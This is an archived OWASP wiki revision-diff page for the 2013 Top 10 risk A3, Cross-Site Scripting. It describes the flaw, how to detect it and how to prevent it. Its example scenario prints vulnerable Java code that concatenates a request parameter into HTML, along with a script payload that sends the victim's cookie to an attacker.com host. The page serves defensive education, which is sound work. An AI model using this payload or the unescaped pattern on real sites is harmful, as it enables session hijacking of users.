This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Difference between revisions of "Top 10 2013-A3-Cross-Site Scripting (XSS)"
(added 'Top_10:SummaryTableTemplate' to get this section easier and to get better prepared for internationalisation. + added '|language=en' to get better prepared for internationalisation.) |
|||
Line 3: | Line 3: | ||
|next={{Top_10_2010:ByTheNumbers | |next={{Top_10_2010:ByTheNumbers | ||
|4 | |4 | ||
− | |year=2013}} | + | |year=2013 |
+ | |language=en}} | ||
|useprev=2013PrevLink | |useprev=2013PrevLink | ||
|prev={{Top_10_2010:ByTheNumbers | |prev={{Top_10_2010:ByTheNumbers | ||
|2 | |2 | ||
− | |year=2013}} | + | |year=2013 |
+ | |language=en}} | ||
}} | }} | ||
− | {{Top_10_2010:SummaryTableHeaderBeginTemplate|year=2013}} | + | {{Top_10_2010:SummaryTableHeaderBeginTemplate|year=2013|language=en}} |
− | {{ | + | {{Top_10:SummaryTableTemplate|exploitability=2|prevalence=0|detectability=1|impact=2|year=2013|language=en}} |
− | |||
− | |||
− | |||
{{Top_10_2010:SummaryTableHeaderEndTemplate|year=2013}} | {{Top_10_2010:SummaryTableHeaderEndTemplate|year=2013}} | ||
<td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>Consider anyone who can send untrusted data to the system, including external users, internal users, and administrators. | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>Consider anyone who can send untrusted data to the system, including external users, internal users, and administrators. | ||
Line 31: | Line 30: | ||
{{Top_10_2010:SummaryTableEndTemplate}} | {{Top_10_2010:SummaryTableEndTemplate}} | ||
− | {{Top_10:SubsectionTableBeginTemplate|type=main}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=vulnerableTo|position=firstLeft|risk=3|year=2013}} | + | {{Top_10:SubsectionTableBeginTemplate|type=main}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=vulnerableTo|position=firstLeft|risk=3|year=2013|language=en}} |
You need to ensure that all user supplied input sent back to the browser is properly escaped before it is included in the output page, or it is verified to be safe via input validation. Proper output encoding ensures that such input is always treated as text in the browser, rather than active content. If AJAX is being used to dynamically update the page, you should try to use safe [https://www.owasp.org/images/c/c5/Unraveling_some_Mysteries_around_DOM-based_XSS.pdf safe JavaScript APIs]. For unsafe JavaScript APIs, encoding or validation must be used. | You need to ensure that all user supplied input sent back to the browser is properly escaped before it is included in the output page, or it is verified to be safe via input validation. Proper output encoding ensures that such input is always treated as text in the browser, rather than active content. If AJAX is being used to dynamically update the page, you should try to use safe [https://www.owasp.org/images/c/c5/Unraveling_some_Mysteries_around_DOM-based_XSS.pdf safe JavaScript APIs]. For unsafe JavaScript APIs, encoding or validation must be used. | ||
Line 37: | Line 36: | ||
Web 2.0 technologies, such as AJAX, make XSS much more difficult to detect via automated tools. | Web 2.0 technologies, such as AJAX, make XSS much more difficult to detect via automated tools. | ||
− | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=howPrevent|position=right|risk=3|year=2013}} | + | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=howPrevent|position=right|risk=3|year=2013|language=en}} |
How Do I Prevent XSS? | How Do I Prevent XSS? | ||
Preventing XSS requires keeping untrusted data separate from active browser content. | Preventing XSS requires keeping untrusted data separate from active browser content. | ||
Line 45: | Line 44: | ||
# Consider [[Content Security Policy]] (CSP) to defend against XSS across your entire site. | # Consider [[Content Security Policy]] (CSP) to defend against XSS across your entire site. | ||
− | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=example|position=left|risk=3|year=2013}} | + | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=example|position=left|risk=3|year=2013|language=en}} |
The application uses untrusted data in the construction of the following HTML snippet without validation or escaping: | The application uses untrusted data in the construction of the following HTML snippet without validation or escaping: | ||
Line 62: | Line 61: | ||
Detection of most XSS flaws is fairly easy via testing or code analysis. | Detection of most XSS flaws is fairly easy via testing or code analysis. | ||
− | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=references|position=right|risk=3|year=2013}} | + | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=references|position=right|risk=3|year=2013|language=en}} |
{{Top_10_2010:SubSubsectionOWASPReferencesTemplate}} | {{Top_10_2010:SubSubsectionOWASPReferencesTemplate}} | ||
* [[XSS (Cross Site Scripting) Prevention Cheat Sheet | OWASP XSS Prevention Cheat Sheet | * [[XSS (Cross Site Scripting) Prevention Cheat Sheet | OWASP XSS Prevention Cheat Sheet | ||
Line 83: | Line 82: | ||
|next={{Top_10_2010:ByTheNumbers | |next={{Top_10_2010:ByTheNumbers | ||
|4 | |4 | ||
− | |year=2013}} | + | |year=2013 |
+ | |language=en}} | ||
|useprev=2013PrevLink | |useprev=2013PrevLink | ||
|prev={{Top_10_2010:ByTheNumbers | |prev={{Top_10_2010:ByTheNumbers | ||
|2 | |2 | ||
− | |year=2013}}}} | + | |year=2013 |
+ | |language=en}} | ||
+ | }} |
Revision as of 11:26, 9 June 2013
NOTE: THIS IS NOT THE LATEST VERSION. Please visit the OWASP Top 10 project page to find the latest edition.
[[Top 10 {{{year}}}-Broken Authentication and Session Management|← Broken Authentication and Session Management]] | [[Top_10_{{{year}}}-Top 10|{{{year}}} Top 10 List]] |
[[Top 10 {{{year}}}-Insecure Direct Object References|Insecure Direct Object References →]] |
Threat Agents | Attack Vectors | Security Weakness | Technical Impacts | Business Impacts | |
---|---|---|---|---|---|
Application Specific | Exploitability AVERAGE |
Prevalence VERY WIDESPREAD |
Detectability EASY |
Impact MODERATE |
Application / Business Specific |
Consider anyone who can send untrusted data to the system, including external users, internal users, and administrators. . | Attacker sends text-based attack scripts that exploit the interpreter in the browser. Almost any source of data can be an attack vector, including internal sources such as data from the database. | XSS is the most prevalent web application security flaw. XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content. There are three known types of XSS flaws: 1) Stored, 2) Reflected, and 3) DOM based XSS.
Detection of most XSS flaws is fairly easy via testing or code analysis. |
Attackers can execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users, hijack the user’s browser using malware, etc. | Consider the business value of the affected system and all the data it processes.
Also consider the business impact of public exposure of the vulnerability. |
Am I Vulnerable To 'Cross-Site Scripting (XSS)'?
You need to ensure that all user supplied input sent back to the browser is properly escaped before it is included in the output page, or it is verified to be safe via input validation. Proper output encoding ensures that such input is always treated as text in the browser, rather than active content. If AJAX is being used to dynamically update the page, you should try to use safe safe JavaScript APIs. For unsafe JavaScript APIs, encoding or validation must be used. Automated tools can find some XSS problems automatically. However, each application builds output pages differently and uses different browser side interpreters such as JavaScript, ActiveX, Flash, and Silverlight, which makes automated detection difficult. Therefore, complete coverage requires a combination of manual code review and pen testing, in addition to automated approaches. Web 2.0 technologies, such as AJAX, make XSS much more difficult to detect via automated tools. |
How Do I Prevent 'Cross-Site Scripting (XSS)'?
How Do I Prevent XSS? Preventing XSS requires keeping untrusted data separate from active browser content.
|
Example Attack Scenarios
The application uses untrusted data in the construction of the following HTML snippet without validation or escaping: (String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>"; The attacker modifies the 'CC' parameter in their browser to: '><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>' This causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session. Note that attackers can also use XSS to defeat any automated CSRF defense the application might employ. See A8 for info on CSRF. Detection of most XSS flaws is fairly easy via testing or code analysis. |
References
OWASP
External |
[[Top 10 {{{year}}}-Broken Authentication and Session Management|← Broken Authentication and Session Management]] | [[Top_10_{{{year}}}-Top 10|{{{year}}} Top 10 List]] |
[[Top 10 {{{year}}}-Insecure Direct Object References|Insecure Direct Object References →]] |